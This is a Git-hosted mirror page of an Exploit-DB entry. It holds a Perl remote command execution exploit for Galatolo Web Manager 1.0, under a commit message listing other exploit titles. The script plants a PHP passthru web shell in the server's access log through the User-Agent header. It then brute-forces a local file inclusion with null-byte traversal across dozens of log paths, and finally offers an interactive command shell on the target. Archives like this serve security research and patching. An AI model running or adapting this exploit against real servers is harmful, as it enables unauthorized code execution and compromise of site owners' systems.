bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/5758.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

131 lines
4.3 KiB
Text
Executable file
Raw Blame History

#!/usr/bin/perl
# Galatolo Web Manager 1.0 Remote Command Execution Exploit
# by yeat - staker[at]hotmail[dot]it
use IO::Socket;
use LWP::UserAgent;
my ($lwp,$response) = new LWP::UserAgent;
my ($host,$path) = @ARGV;
if (@ARGV != 2) {
print "Galatolo Web Manager 1.0 Remote Command Execution Exploit\n";
print "by yeat - staker[at]hotmail[dot]it\n";
print "Usage: perl $0 [host] [path]\n";
exit;
}
inject_log();
shell_exec();
sub log_path
{
my $path = undef;
my @logs = (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../var/log/apache2/error.log",
"../../../../../var/log/apache2/access.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
$lwp->agent('Lynx (textmode)');
for (my $i=0;$i<=$#logs;$i++) {
$response = $lwp->get("http://$host/$path/index.php?cmd=echo '<yeatr0x>';&com=${logs[$i]}%00");;
if ($response->content =~ m/<yeatr0x>/i) {
$path = $logs[$i];
break;
}
} return $path;
}
sub shell_exec
{
my $log = log_path();
my $nos = "echo '<lulz>'";
$lwp->agent('Lynx (textmode)');
while (1) {
print "\n[shell]~# ";
chomp($cmd = <STDIN>);
if ($cmd !~ /^(exit|exit--|--exit)$/i) {
$response = $lwp->get("http://$host/$path/index.php?cmd=$nos;$cmd;$nos;&com=$log%00");
if ($response->content =~ /<lulz>*/i) {
@split = split('<lulz>',$response->content);
print $split[1];
}
}
else {
die "Exited.";
}
}
}
sub inject_log
{
my $header = undef;
my $xploit = "lulz<?php passthru(stripslashes(\$_GET['cmd'])); exit; ?>";
my $socket = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
$header .= "GET / HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "User-Agent: $xploit\r\n";
$header .= "Connection: close\r\n\r\n";
return $socket->send($header);
}
# milw0rm.com [2008-06-08]
Reference in a new issue View git blame Copy permalink